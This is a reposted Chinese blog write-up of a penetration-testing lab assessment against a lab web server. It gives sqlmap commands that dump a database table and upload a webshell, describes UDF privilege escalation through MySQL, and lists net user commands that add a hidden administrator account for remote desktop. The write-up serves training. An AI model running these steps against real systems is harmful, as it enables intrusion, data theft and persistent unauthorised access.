ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

记一次靶场考核

2020-08-11 15:32:55  阅读:290  来源: 互联网

标签:sqlmap 一次 -- 192.168 考核 key 根目录 靶场 php


记一次靶场考核

当天考核还是too vegetable,回去跟着带佬复现了一下,在此记录一下

VPN连上之后打开题目网址http://192.168.6.18/


先来御剑一波(忽略10和11两条这是之前复现上传的)

找到phpinfo查看信息

第一个Key get
发现第一个key 发现网站根目录绝对路径 file_upload开启等信息


挂上Xray代理,xray被动扫描xray.exe webscan --listen 127.0.0.1:7777 --html-output 2.html

监听本地7777端口 输出html报告命名为2.html,浏览器挂上xray代理,开始点点点
找到了个注入点



发现XSS, 敏感文件泄露 SQL注入漏洞,
使用sqlmap 注入点 http://192.168.6.18/index.php?c=article&id=77 注入参数为id
sqlmap -u "http://192.168.6.18/index.php?c=article&id=77" -D web -T dy_admin_user -C thekey --dump

得到第二个key
用sqlmap上传shell
sqlmap -u "http://192.168.6.18/index.php?c=article&id=77" --file-write ‪C:\Users\Threesoil\Desktop\shell.php --file-dest d:/wamp/www/shell.php‬
蚁剑连接

发现第三个key在网站根目录下

蚁剑翻一翻文件C盘根目录下有key

蚁剑终端显示webshell权限不是系统最高权限,接下来UDF提权
提权方法(这是拿到webshell,能够以低权限执行操作系统命令之后再去操作的):
上传udf.php到WEB目录,访问它,填写数据库root账号的密码(在根目录下config.php里面),

点击页面的前两个按钮,之后,就可以执行query了

点这两个,然后再点左下角的mysql_query此时已经可以通过高权限的身份执行操作系统命令了 已经结束了

整体操作结束了
然后通过net user添加系统账号,登录3389远程桌面
net user 账号 口令 /add
net localgroup administrators 账号 /add

没找到网站后台,通过SQL注入,发现web数据库里面都是dy_开头的表名,对吧,甚至有一个表叫做dy_admin_user
数据库里跑出来的口令部分的十六进制字符串,一般都是hash之后的,32位16进制数的,往往是MD5,40位的,往往是SHA-1
从蚁剑上也能看出来后台地址

标签:sqlmap,一次,--,192.168,考核,key,根目录,靶场,php
来源: https://www.cnblogs.com/threesoil/p/13475899.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有